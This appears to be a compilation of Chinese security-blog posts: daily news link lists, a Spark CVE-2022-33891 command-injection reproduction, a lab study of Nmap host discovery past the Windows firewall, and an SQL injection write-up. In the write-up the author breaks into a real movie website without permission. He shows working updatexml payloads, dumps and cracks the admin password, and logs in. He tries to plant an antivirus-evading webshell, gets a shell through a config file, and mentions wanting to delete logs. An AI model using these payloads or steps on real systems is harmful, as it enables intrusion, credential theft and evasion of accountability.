网络安全日报 2022年10月20日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、研究人员发现大量恶意应用程序窃取Facebook登录信息
https://www.malwarebytes.com/blog/news/2022/10/warning-facestealer-ios-and-android-apps-steal-your-facebook-login 2、研究人员发现针对开源存储库的网络攻击增加了633%
https://portswigger.net/daily-swig/researchers-find-633-increase-in-cyber-attacks-aimed-at-open-source-repositories 3、研究人员称RansomCartel勒索团伙与REvil勒索团伙有关
https://www.bleepingcomputer.com/news/security/ransom-cartel-linked-to-notorious-revil-ransomware-operation/ 4、Apache Commons Text中存在严重的安全漏洞
https://blog.aquasec.com/cve-2022-42889-text2shell-apache-commons-vulnerability 5、研究人员发现了新的完全无法检测到的PowerShell后门
https://www.safebreach.com/resources/blog/safebreach-labs-researchers-uncover-new-fully-undetectable-powershell-backdoor/ 6、VisionWeb数据泄露影响多达35900人
https://www.hipaajournal.com/visionweb-data-breach-affects-up-to-35900-individuals/ 7、Lazarus APT在日本利用网络钓鱼攻击加密货币交易所
https://cryptopotato.com/north-korean-hacker-group-lazarus-phishing-for-crypto-in-japan-report/ 8、八块RTX 4090显卡阵列可在60分钟内破解八位密码
https://www.cnbeta.com/articles/tech/1328407.htm 9、黑客称他们从英国一保险公司窃取了 1.4TB 数据
https://cybernews.com/news/hackers-stole-data-from-kingfisher-insurance/ 10、施耐德 UMAS 协议中的漏洞被发现
https://www.itweb.co.za/content/WnxpE74YYExMV8XL
记一次SQL注入的收获
一、发现漏洞
1.1. 发现
这是一篇两年前的笔记了。之前平常喜欢看些电影影片,不想充值VIP,才发现的网站,但是这个网站A并不是主要测试的,而是通过发现他的兄弟网站B,然后进行渗透。
1.2. 测试
有事没事对网站动一动,发现A存在XSS,但是并没有多大的利用价值,但是通过友情链接,跳转到了B,就觉得B可能也在同个位置存在XSS但是,令人惊讶的是,我没发现XSS,但是确发现存在SQLI。加了个’,直接把sql语句爆出来了,如下图1。
图 1
二、漏洞利用
2.1 闭合规则
原始的语句:
SELECT `y80s_movies`.*, `y80s_photos`.`path` AS photo_path, `y80s_photos`.`share` AS photo_share
FROM (`y80s_movies`)
LEFT OUTER JOIN `y80s_photos` y80s_photos ON `y80s_photos`.`id` = `y80s_movies`.`photo_id`
WHERE `y80s_movies`.`public` = '1'
AND `y80s_movies`.`attribute` NOT LIKE '%%1%%'
AND (name like '%XXX%' or aka like '%XXX%')
ORDER BY `y80s_movies`.`update` DESC, `y80s_movies`.`id` DESC
LIMIT 25
原始报文:
HTTP/1.1 500 Internal Server Error
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Accept-Encoding, UserAccount
Server: nginx
Date: Thu, 29 Oct 2020 01:36:40 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.6.38
X-Cache: MISS from aws-jp08
X-Cache: MISS from asia-hk11
Connection: close
Content-Length: 882
Array
(
[0] => Error Number: 1064
[1] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or aka like '%xxx%')
ORDER BY `y80s_movies`.`update` DESC, `y80s_movies`.' at line 6
[2] => SELECT `y80s_movies`.*, `y80s_photos`.`path` AS photo_path, `y80s_photos`.`share` AS photo_share
FROM (`y80s_movies`)
LEFT OUTER JOIN `y80s_photos` y80s_photos ON `y80s_photos`.`id` = `y80s_movies`.`photo_id`
WHERE `y80s_movies`.`public` = '1'
AND `y80s_movies`.`attribute` NOT LIKE '%%1%%'
AND (name like '%XXX%' or aka like '%XXX'%')
ORDER BY `y80s_movies`.`update` DESC, `y80s_movies`.`id` DESC
LIMIT 25
[3] => Filename: /home/wwwroot/XXXX/libraries/datamapper.php
[4] => Line Number: 1410
)
<html>
<head>
<title>Error</title>
</head>
<body>
hi</body>
</html>
XXX为输入的位置,同上可以看出,会同时在两处插入,但其实只需要管一处即可,后面可以注释掉。
当时在考虑,怎么闭合这个规则,怎么执行自己想执行的语句。但是可能被这么长的语句吓到了,不知道从何下手。也可能是因为自己数据库基础不扎实。其实仔细分析,都是可以化繁为简的。这语句也就是select 字段 from 表名 (一个左外连接) where XXX and XXX and XXX order by XXX。以上是我想的,看看老王想的:这个构造看清大逻辑,select xxx from ta left outer join tb on ta.a=tb.b where con1=xxxxx and con2=xxxx oder by a.a,b.b limit 25,然后得出:注入是在whe
2.2 爆数据
这步应该是最多的,一开始自己找不到闭合规则,经常会报错,而且还是乱码,如下图2:
图 2
一开始猜测是回显了数据表,所以导致了乱码,但是并不是,应该只是服务器的问题。这服务器本来就不太稳定,换下查询数据,刷新页面,多试几次就好了。然后思路就想着,构造一个判断语句,通过是与否来判断数据库的信息,然后有了以下的两个payload:
1、%e4%ba%ba') and 1=1 or (‘1’=’1
2、%e4%ba%ba') and exists(select path from y80s_photos) or ('1'='1
但是这payload真的是太傻了,好在报错信息有提供表名和mysql默认表dual,不然都没法判断是否构造完成。接下来是内容由老王指导完成。
通过union或者updatexml进行查询,内容有回显,一开始我并不知道的,后面通过百度查询到了updatexml用法,于是自己构造了个:
1、%e7%88%b1') and updatexml(1,concat('~',(select database()),'~'),3)--+
获取了数据名80s,如下图3:
图 3
既然可以回显,那紧接着,就是查询所有的表名。
笔记:
查询数据库中所有表名
select table_name from information_schema.tables where table_schema='数据库名' and table_type='base table';
select table_name from information_schema.tables where table_schema='数据库名'
查询指定数据库中指定表的所有字段名column_name
select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名'
于是构造了
payload:%e7%88%b1') and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='80s' limit 0,1),'~'),3)--+
其实limit是后面加的,服务器返回:Subquery returns more than 1 row,但是这边只能显示一条,所以一开始思路是使用limit一条一条去查出来,如下图4、图5:
图 4
图 5
利用burp-Intruder爆破出数据库,但是,这样太慢了。
老王提供了个函数group_concat(),group_concat()类似一个聚集函数,把所有内容拼接成字符串,默认用逗号隔开。于是我的payload就变成:
%e6%98%9f') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='80s'),'~'),3)--+
但是,人算不如天算,他回显内容有限制长度的,如下图6:
图 6
看Y80应该可以明显感觉断了,及时看不出来,也不应该就这几个表吧!这时候想到,我们岂不是可以通过limit限制内容,把已经看到了的不输出,我真是天才,然后我构造了payload:
%e6%98%9f') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='80s' limit 6,2),'~'),3)--+
发现页面居然正常跳转了,没有报错,我人傻了,估计是sql语句又哪里有问题了吧!后面看了老王的,他构造的是:
123333') and updatexml(1,concat(0x7e,(select group_concat(x.movie_id) from (select movie_id from hits limit 3,3)x),0x7e),1)--+
select group_concat(x.movie_id) from x,从x表查询movieid,然后聚集成一行,x表是个别名,x = seelect movie_id from hits limit 3,3,从hits查movieid,从记录3往后查3条,结果是个一列三行的数据临时表,然后前面配合聚集,把这三行连接,这样就不用limit a,1这种,每次限制一行记录,这个可以limit a,5这样,一次查五条。搜嘎!
由于我只是想登入后台,尝试找出管理员的表即可,我就还是一个一个试,最终找到管理员表y80s_managers,然后根据payload:
%e6%98%9f') and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='80s' and table_name='y80s_managers'),'~'),3)--+
查询出字段名id,name,password,right_id,lock等,如下图7:
图 7
但是我们主要还是账号名密码,所以继续!构造payload:
%e5%a6%bb') and updatexml(1,concat('~',(select group_concat(name) from y80s_managers),'~'),3)--+
如下图8:
图 8
可以看到,只有一个账户,name为me****zz,再查询密码,如下图9:
图 9
忘记这个是有限制字段的,也没注意看是否是以~结尾,然后拿去md5解密,发现解不开,数了一下,31位的md5?这时候才发现,后面还有。于是使用substr函数,去截取后面的字段,回显!
Payload:%e6%96%b0') and updatexml(1,concat('~',(select substr(password,31) from y80s_managers),'~'),3)--+
Substr(str,pos,len),pos开始的位置,len为长度,str字符串,len没输入的时候默认是pos开始截取到最后的位置。于是有了以下图10:
图 10
果然掉了一位,最后得到md5:9356*************63c
三、解密账号密码
3.1成功登录
Md5解开后得到账号名密码:
Me****zz,935********63c(pj*****@)
然后使用dirsearch,搜索出后台(其实我是先找到后台才想着去注入的),成功登录,如下图11:
图 11
原本想删除登录记录的,但是发现这后台功能有点简陋,好像没有发现有登录记录之类的,就没先下了,后续再二次进攻!
3.2 收获其他信息
以下是收集到的其他信息:
database:80s
mysql5.6.44
table:hits,y80s_ads,y80s_articles,y80s_bigphotos,y80s_caijis,y80s_cast_infos,y80s_casts,y80s_casts_movies,y80s_directors_movies,y80s_directors,
y80s_dlurls,y80s_dlurls_movies,y80s_doubans,y80s_duoshuo_comments,y80s_forhotmovies,y80s_hits,y80s_hotwords,y80s_infos,y80s_managers,y80s_moviedesc_ups
y80s_ads:
id title name content
y80s_managers:
id,name,password,right_id,lock
四、寻找上传点
发现该网站存在设置影片的图片,直接上免杀马。免杀马是github上大佬写的生成工具,已测试过是可以过360和D盾的。链接:https://github.com/pureqh/Troy
服务器直接报错。多番尝试发现无法上传马。还发现了数据库备份,但是貌似无法修改数据库扩展名。
五、柳暗花明又一村
在查看网站功能的时候,我又发现了另一个好东西:
配置文件编辑。直接把一句话木马写到配置文件里面。通过写入<?php phpinfo();?>后,发现在每个页面初始化的时候,都会去调用该配置文件。直接getshell。
六、小结
闭合规则是花费时间最长的,还有后面要利用的时候,构造payload也是我花费时间最多的,基本都是百度上查,很多都不懂,两个的根本原因还是因为对sql注入,乃至数据库的基础都不是很懂,很多函数,都不知道,不知道有功能有什么函数,在利用的时候就难以下手,耗费大量时间。其次还可通过mysql直接写入shell的,这个也是后面才知道的,不过写入shell的前提条件较为苛刻。
网络安全日报 2022年10月19日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、欧洲风险投资和私募股权公司 Smartfin收购了Hex-Rays
https://www.securityweek.com/ida-pro-owner-hex-rays-acquired-european-vc-firm 2、工业网络安全市场预计将在未来十年以显着速度增长
https://www.securityweek.com/industrial-cybersecurity-market-expected-soar-next-decade 3、超过 17000 台在线 Fortinet 设备易受到 CVE-2022-40684 的攻击
https://securityaffairs.co/wordpress/137273/hacking/fortinet-cve-2022-40684-vulnerable-systems.html 4、欧洲警方逮捕了一个黑入无线遥控钥匙偷车的团伙
https://thehackernews.com/2022/10/european-police-arrest-gang-that-hacked.html 5、黑客利用Qakbot银行木马部署Brute Ratel C4框架
https://thehackernews.com/2022/10/black-basta-ransomware-hackers.html 6、墨西哥调查“飞马”间谍软件的购买是否经过授权
https://www.cnbeta.com/articles/tech/1327983.htm 7、研究人员发现微软Office 365消息加密方法存在漏洞
https://www.hackread.com/office-365-encryption-flaw-message-confidentiality/ 8、红队工具Cobalt Strike发布更新修复了一个远程代码执行漏洞
https://thehackernews.com/2022/10/critical-rce-vulnerability-discovered.html 9、新的PHP信息窃取恶意软件针对Facebook帐户
https://www.bleepingcomputer.com/news/security/new-php-information-stealing-malware-targets-facebook-accounts/ 10、苹果承认部分iPhone 14存在“不支持SIM卡”问题
https://www.cnbeta.com/articles/tech/1327955.htm
Apache Spark UI 命令注入漏洞 CVE-2022-33891
漏洞简介
Apache Spark UI 提供了通过配置选项 spark.acls.enable。 使用身份验证过滤器,这检查用户是否有访问权限来查看或修改应用。如果启用了 ACL,则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后恶意用户可能能够访问权限检查功能,最终将根据他们的输入构建一个 Unix shell 命令,并且执行它。这将导致任意 shell 命令执行。
影响版本:Apache Spark 版本 3.0.3 及更早版本,版本 3.11 至 3.1.2 ,以及版本 3.2.0 至 3.2.1
漏洞复现
下载 Apache Spark 3.2.1 https://archive.apache.org/dist/spark/
https://archive.apache.org/dist/spark/spark-3.2.1/spark-3.2.1-bin-hadoop2.7.tgz
根据描述是需要开启 acl 功能才可以触发漏洞
开启 ACL 可以通过设定启动时的参数 ./spark-shell --conf spark.acls.enable=true 或者在 conf/spark-defaults.conf 中添加 spark.acls.enable true
构造 poc
http://localhost:4040/?doAs=`[command injection here]`
漏洞分析
为了方便调试在启动脚本中添加上调试参数
export SPARK_SUBMIT_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005"
输入错误的执行语句时的报错信息
漏洞的触发大概就在 org.apache.spark.security.ShellBasedGroupsMappingProvider.getUnixGroups
漏洞的调用栈应该为
org.apache.spark.ui.HttpSecurityFilter.doFilter(HttpSecurityFilter.scala:71)
org.apache.spark.SecurityManager.checkUIViewPermissions(SecurityManager.scala:238)
org.apache.spark.SecurityManager.isUserInACL(SecurityManager.scala:381)
org.apache.spark.util.Utils$.getCurrentUserGroups(Utils.scala:2523)
org.apache.spark.security.ShellBasedGroupsMappingProvider.getGroups(ShellBasedGroupsMappingProvider.scala:34)
org.apache.spark.security.ShellBasedGroupsMappingProvider.getUnixGroups(ShellBasedGroupsMappingProvider.scala:43)
加上断点进行调试分析
org.apache.spark.ui.HttpSecurityFilter#doFilter
获取到参数 doAS 赋值为 effectiveUser 传到函数 checkUIViewPermissions
org.apache.spark.SecurityManager#checkUIViewPermissions
org.apache.spark.SecurityManager#isUserInACL
org.apache.spark.util.Utils$#getCurrentUserGroups
org.apache.spark.security.ShellBasedGroupsMappingProvider#getGroups
org.apache.spark.security.ShellBasedGroupsMappingProvider#getUnixGroups
通过反引号将想要执行的命令包含起来,拼接到原本的命令执行语句中
org.apache.spark.util.Utils$#executeAndGetOutput
org.apache.spark.util.Utils$#executeCommand
漏洞补丁
新版本的修复 删除了 ShellBasedGroupsMappingProvider 中的 bash 的调用,最后执行命令的语句应该变为/usr/bin/id -Gn + 传入参数
网络安全日报 2022年10月18日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、研究人员绕过了微软更新的"ProxyNotShell "漏洞修复指导方案
https://www.4hou.com/posts/q8nR 2、Zoom for macOS 推出补丁修复高危漏洞
https://www.securityweek.com/zoom-macos-contains-high-risk-security-flaw 3、新 UEFI rootkit Black Lotus 售价 5,000 美元
https://securityaffairs.co/wordpress/137252/malware/black-lotus-uefi-rootkit.html 4、日本科技公司 Oomiya 的 IT 基础设施遭 LockBit 3.0 勒索软件攻击
https://securityaffairs.co/wordpress/137243/cyber-crime/oomiya-lockbit-3-0-ransomware.html 5、国际刑警组织逮捕了网络犯罪团伙 Black Axe 的 75 名成员
https://securityaffairs.co/wordpress/137220/cyber-crime/interpol-arrests-black-axe-members.html 6、Venus勒索软件对公开暴露的远程桌面服务发起攻击
https://www.bleepingcomputer.com/news/security/venus-ransomware-targets-publicly-exposed-remote-desktop-services/ 7、CISA发布RedEye开源分析工具
https://www.helpnetsecurity.com/2022/10/17/cisa-redeye-open-source-analytic-tool/ 8、公网中超过45000台ESXi服务器生命周期结束,易受攻击
https://www.bleepingcomputer.com/news/security/over-45-000-vmware-esxi-servers-just-reached-end-of-life/ 9、0path补丁服务为Windows 7系统额外提供2年支持至2025年
https://www.cnbeta.com/articles/tech/1326971.htm 10、关键 Fortinet 身份验证绕过漏洞的POC已经发布
https://thehackernews.com/2022/10/poc-exploit-released-for-critical.html
网络安全日报 2022年10月17日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Magniber勒索软件通过JavaScript文件感染Windows用户
https://www.bleepingcomputer.com/news/security/magniber-ransomware-now-infects-windows-users-via-javascript-files/ 2、GitLab修复GitHub导入功能中的RCE漏洞
https://portswigger.net/daily-swig/gitlab-patches-rce-bug-in-github-import-function 3、荷兰警方伪造赎金支付诱骗DeadBolt勒索软件团伙获得155个解密密钥
https://www.bleepingcomputer.com/news/security/police-tricks-deadbolt-ransomware-out-of-155-decryption-keys/ 4、Microsoft电子邮件加密协议存在严重的安全漏洞
https://www.govinfosecurity.com/microsoft-email-encryption-vulnerable-to-structural-leaks-a-20262 5、黑客使用Zimbra零日漏洞攻击近900台服务器
https://www.bleepingcomputer.com/news/security/almost-900-servers-hacked-using-zimbra-zero-day-flaw/ 6、Mango Markets同意向黑客支付4700万美元作为漏洞赏金
https://www.govinfosecurity.com/mango-markets-set-to-pay-47m-bug-bounty-to-hacker-a-20275 7、BAE 为 F-16 战斗机发布新的网络安全系统
https://www.securityweek.com/bae-releases-new-cybersecurity-system-f-16-fighter-aircraft 8、印度最大电力公司 Tata Power 的 IT 基础设施受到网络攻击
https://thehackernews.com/2022/10/indian-energy-company-tata-powers-it.html 9、Palo Alto Networks修复了PAN-OS中的高危身份验证绕过漏洞
https://securityaffairs.co/wordpress/137138/security/palo-alto-networks-pan-os-flaw-3.html 10、研究人员发现冒充Convertio网站传播恶意软件的活动
https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/
网络安全日报 2022年10月14日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Cloudflare 阻止了针对 Minecraft 服务器的 2.5 Tbps DDoS 攻击
https://securityaffairs.co/wordpress/137062/hacking/ddos-attack-record-q3-2022.html 2、研究人员发现一种新的攻击框架,包括一个名为 Alchimist 的 C2 工具
https://securityaffairs.co/wordpress/137046/hacking/alchimist-c2-tool.html 3、Mango Markets 在闪电贷攻击中损失超过 1 亿美元
https://therecord.media/crypto-trading-platform-mango-markets-drained-of-more-than-100-million-in-flash-loan-attack/ 4、Robustel R1510 工业蜂窝网络路由器存在多个严重漏洞
https://blog.talosintelligence.com/2022/10/vuln-spotlight-robustel-router.html 5、黑客组织Polonium使用恶意软件针对以色列发起攻击
https://thehackernews.com/2022/10/researchers-uncover-custom-backdoors.html 6、npm定时攻击可能威胁供应链安全
https://www.bleepingcomputer.com/news/security/new-npm-timing-attack-could-lead-to-supply-chain-attacks/ 7、NIST 牵头组建商用卫星利益共同体,推进混合卫星网络安全指南研制
https://www.secrss.com/articles/47824 8、西门子SIMATIC PLC中的严重漏洞可能让攻击者窃取加密密钥
https://thehackernews.com/2022/10/critical-bug-in-siemens-simatic-plcs.html 9、QBot恶意软件在新的攻击活动中感染了800多名企业用户
https://www.securityweek.com/qbot-malware-infects-over-800-corporate-users-new-ongoing-campaign 10、Aruba修复了EdgeConnect Enterprise Orchestrator中的关键漏洞
https://securityaffairs.co/wordpress/137000/security/aruba-edgeconnect-flaws.html
Nmap抓包分析与绕过Windows防火墙
前言
在打靶场的过程中使用Nmap时发现点小问题,借此机会详细分析下情况,于是有了这篇文章。
本文包含以下内容:
Nmap抓包分析
内网下绕过Windows防火墙扫描存活主机
这里主要是针对Nmap进行讨论,实战中当然哪个快用哪个。不过万变不离其宗,哪怕稍微了解下其原理都受益无穷。
防火墙
这里的防火墙值得是Windows server自带的防火墙,主要绕过其两个防御规则:
1.禁止ICMP回显
2.隐藏模式
具体见https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd448557(v=ws.10)?redirectedfrom=MSDN,大意为:不会使用ICMP不可达响应UDP查询,不使用RST响应TCP查询。默认开启。
https://shamsher-khan-404.medium.com/understanding-nmap-scan-with-wireshark-5144d68059f7-sn:禁用端口扫描
-P* 用于选择不同的PING方法,用于存活扫描
Nmap抓包分析
拓扑图
关闭防火墙便于查看数据包
主机发现(Ping)
-PS(TCP SYN)
TCP SYN Ping:发送单个TCP SYN包到指定端口检测主机是否存活,默认80端口。该扫描就是经典的半开放扫描。
请求局域网主机135端口(开启)
nmap -sn -PS135 172.16.1.128 -vvv -n --disable-arp-ping
#-n 禁用dns解析
注意nmap扫局域网存活主机都会预先进行arp扫描,在这里禁用了端口扫描,意味着nmap只会进行存活扫描,当nmap进行arp扫描后发现主机存活就不会进行后续操作,wireshark也就抓不到包,所以使用--disable-arp-ping禁用arp扫描。
请求局域网主机666端口(关闭)
nmap -sn -PS666 172.16.1.128 -vvv -n --disable-arp-ping
请求远程主机135端口(开启):
还是这里会发现,和扫局域网比起来多了很多包,为什么和扫局域网情况不一样?
还是fofa随便找个开启135端口的IP:
这里会发现,和扫局域网比起来多了很多包。
请求远程主机6666端口(关闭):
奇怪的是,明明远程主机返回了RST/ACK包,但nmap没有接收到。
为什么会有这样的差别?翻了翻nmap官方文档,其中有这样一句话:
RST报文是运行Nmap的机器的内核为响应意外的SYN/ACK而发送的,而不是Nmap本身。
突然想到,我的kali是放在vmware,以nat形式接入网络,这样偶尔会出现点小问题。
于是我在windows上装了个nmap再进行测试:
再看下抓包
发现这里没发RST包
关掉防火墙再试,还一下发俩RST……
接下来将vmware网络模式换为桥接,发现正常了。说明是NAT网络的问题。
-PA(TCP ACK)
TCP ACK Ping:发送单个TCP ACK包到指定端口检测主机是否存活,默认80端口
请求局域网主机135端口(开启)
一般ACK包是双方建立起连接发送的,但实际上不存在连接,无论端口是否开启,远程主机都会用RST包来回应,以此来判断主机存活。当然很多防御策略都会丢弃无效包防止被检测。
nmap -sn -PA135 172.16.1.128 -vvv -n --disable-arp-ping
请求局域网主机666端口(关闭)
nmap -sn -PA666 172.16.1.128 -vvv -n --disable-arp-ping
-PU(UDP)
UDP Ping:发送UDP包到指定端口检测主机是否存活,默认40125端口。特定端口会发送特定的UDP包以便于获取更好的响应。
按照最新官方文档解释,该包发送大概有以下几种情况:
端口关闭->返回ICMP端口不可达包->判断主机存活。
返回其他ICMP错误,如主机/网络不可达或TTL超标等->判断停机。
端口开启且该服务不响应—>nmap未接收到返回包->判断停机。
端口关闭且协议不匹配->返回ICMP端口不可达包->判断主机存活。
这就是为什么默认要用40125这么冷门的端口,避免有服务使用该端口。
nmap -sn -PA135 172.16.1.128 -vvv -n --disable-arp-ping
返回ICMP端口不可达,仍旧判断出主机存活。
局域网没什么问题,扫外网的话同样有前文说的Vmware Nat网络问题,注意一下就好。
-PY(SCTP INIT)
SCTP INIT Ping:发送包含最小INIT块的SCTP包到指定端口检测主机是否存活,默认80端口。SCTP可看做TCP协议的改版。
nmap -sn -PY135 172.16.1.128 -vvv -n --disable-arp-ping
返回协议不可达,以此判断出主机存活。
-PR(ARP)
ARP Ping:ARP扫描,Nmap扫内网最常用的方式。
nmap -sn -PR 172.16.1.128 -vvv -n
接收到arp返回包,判断主机存活。
-PE/PP/PM(ICMP)
ICMP Ping:三种ICMP标准请求,如果防火墙关掉ICMP回显则收不到reply。
第一个就是常说的Ping。
第二个是时间戳请求
第三个是地址掩码请求
ICMP标准还有个信息请求,但目前未被广泛支持,所以Nmap没有做相关功能。
-PO(IP Protocol)
IP Protocol Ping:默认发送ICMP(协议1)、IGMP(协议2)和IP-in-IP(协议4),更改协议需要改nmap.h文件中的DEFAULT_PROTO_PROBE_PORT_SPEC。目前意义不大。
nmap -sn -PO -vv 172.16.1.128 -n --disable-arp-ping
端口扫描(Scan)
其实端口扫描(Scan)很多参数和主机发现(Ping)的前期抓包情况是一样的。Ping相当于点到为止,根据回显发现主机存活即可,而Scan还需要进一步分析,判断端口是否开启、判断什么服务等。
由于大部分Scan参数与Ping参数请求包一致,而部分Scan参数在本文中并未体现,所以暂且贴出三个参数抓包情况。
-sS(TCP SYN)
TCP SYN scan:经典的半开放扫描。
nmap -Pn -sS -p 135 -vvv 172.16.1.128 -n
可见发送的请求包和-PS是一样的,至于Nmap如何判断如何分析,这里就不关心了。
-sT(TCP connect)
TCP connect scan:TCP连接扫描,三次握手确认目标后直接发送RST结束当前连接,跳过四次挥手阶段。
端口开启
nmap -Pn -sT -p 135 172.16.1.128 -vvv -n --disable-arp-ping
# -Pn 不进行主机存活探测
端口关闭
可以发现,-sT和-PS两个扫描的抓包情况十分接近,只有收到SYN/ACK返回包后应答的不同,这也是-PS被称为半开放扫描的原理。
-sU(UDP)
UDP scans:发送UDP包进行扫描
nmap -Pn -sU -p 135 172.16.1.128 -vvv -n --disable-arp-ping
这里显示open|filtered,为什么呢?
因为UDP包请求到开放的端口,经常没有回显。而且这里使用-Pn跳过了主机存活探测,默认主机存活,又因为收不到回显,所以nmap无法判断该端口是开启还是被防御规则过滤。
抓包情况和-PU基本一致:
绕防火墙测试
拓扑图
测试
nmap -sn -PS135 172.16.1.128 -vvv -n --disable-arp-ping
未收到[SYN, ACK]返回包,判断主机离线。
nmap -sn -PA135 172.16.1.128 -vvv -n --disable-arp-ping
未收到[RST, ACK]返回包,判断主机离线。
nmap -sn -PU135 172.16.1.128 -vvv -n --disable-arp-ping
nmap -sn -PY135 172.16.1.128 -vvv -n --disable-arp-ping
nmap -sn -PR 172.16.1.128 -vvv -n
成功收到ARP回显,判断主机存活:
这样一圈测试下来,发现只有ARP扫描可以。原因也很简单,ARP扫描不会走靶机防火墙,而是以广播的形式进行扫描;而其他参数不是被禁ICMP回显规则拦截就是被隐身模式过滤。
后面又尝试了常用的nbt扫描、smb扫描、以及Nmap其他参数,仍然绕不过防火墙。
WINRM
难道就止步于此了吗?突然想到,之前用Ladon插件扫的时候,没见什么防火墙拦截。
于是拿Ladon测试了下,选多协议探测存活主机,一扫,果真有:
WIMRM,很熟悉,这也能拿来扫内网?
简单概述下:WIMRM是windows自带的服务,开启服务后防火墙默认放心5985(HTTP)/5986(HTTPS)端口,平常拿来横向移动。
由于没搜到Ladon源码怎么实现该扫描,谷歌找了找WINRM的文章:https://www.hackingarticles.in/winrm-penetration-testing/
其中有一行代码:
test-wsman -computername "172.16.1.128"
很快就有回显:
随便输了个其他IP,报错:
显然,使用该服务也可以绕过Windows防火墙进行存活主机扫描。
结语
总结一下:
arp扫描
可以使用工具,但到了扫内网的情况,都是拿shell了,所以直接cmd命令:arp/a即可。
WINRM
test-wsman -computername "172.16.1.128"
至于如何绕防火墙进行端口扫描,留到以后再说吧。
网络安全日报 2022年10月13日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Google 向 Android 和 Chrome 推出 Passkey 无密码登录支持
https://thehackernews.com/2022/10/google-rolling-out-passkey-passwordless.html 2、VMware 尚未修复一年前披露的 vCenter Server 中的提权漏洞
https://securityaffairs.co/wordpress/136979/hacking/vmware-unpatched-cve-2021-22048.html 3、LockBit 附属公司入侵 Microsoft Exchange 服务器以部署勒索软件
https://securityaffairs.co/wordpress/136968/cyber-crime/microsoft-exchange-lockbit-ransomware.html 4、网络犯罪分子使用 Vishing 诱骗受害者安装 Android 银行恶意软件
https://thehackernews.com/2022/10/hackers-using-vishing-tactics-to-trick.html 5、微软更新策略阻止对本地管理账户的暴力攻击
https://www.bleepingcomputer.com/news/microsoft/all-windows-versions-can-now-block-admin-brute-force-attacks/ 6、诈骗者伪装成加密货币发起新一轮PayPal诈骗攻击
https://www.infosecurity-magazine.com/news/paypal-invoice-scams-using-crypto/ 7、五角大楼将360、大疆、知道创宇和中科曙光等 13 家中国公司列入黑名单
https://www.solidot.org/story?sid=73010 8、英国将耗资5000万英镑建立新的“国防网络学院”
https://www.secrss.com/articles/47745 9、键盘余热可能泄露密码,20秒内拍下键盘热像图,密码泄露86%
https://www.freebuf.com/articles/database/346627.html 10、Deepfake成网络犯罪经济的新高峰
https://securityaffairs.co/wordpress/136927/cyber-crime/deepfakes-services-cybercrime.html
网络安全日报 2022年10月12日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、研究人员发现一种名为 Caffeine 的新型网络钓鱼即服务 (PhaaS)
https://securityaffairs.co/wordpress/136953/cyber-crime/caffeine-phishing-platform.html 2、Emotet在近期攻击中使用新的传播和规避技术
https://thehackernews.com/2022/10/new-report-uncovers-emotets-delivery.html 3、诈骗者利用Zoom进行网络钓鱼窃取Exchange凭据
https://www.hackread.com/zoom-phishing-scam-ms-exchange-credentials/ 4、新加坡电信面临多起数据泄露事件
https://www.govinfosecurity.com/singtel-confronts-multiple-data-leaks-a-20243 5、国家标准《信息安全技术 智能手机预装应用程序基本安全要求》公开征求意见
https://www.secrss.com/articles/47735 6、伊朗抗议者劫持国有电视台直播
https://www.solidot.org/story?sid=72997 7、Fortinet警告防火墙和代理产品的0day漏洞正在被广泛利用
https://www.securityweek.com/fortinet-confirms-zero-day-vulnerability-exploited-one-attack 8、西门子称不排除黑客未来利用全局私钥进行 PLC攻击的可能性
https://www.securityweek.com/siemens-not-ruling-out-future-attacks-exploiting-global-private-keys-plc-hacking 9、微软周二补丁日修复了90多个安全漏洞
https://www.securityweek.com/microsoft-warns-new-zero-day-no-fix-yet-exploited-exchange-server-flaws 10、印尼大规模数据泄露事件频发
https://www.cnbeta.com/articles/tech/1325467.htm
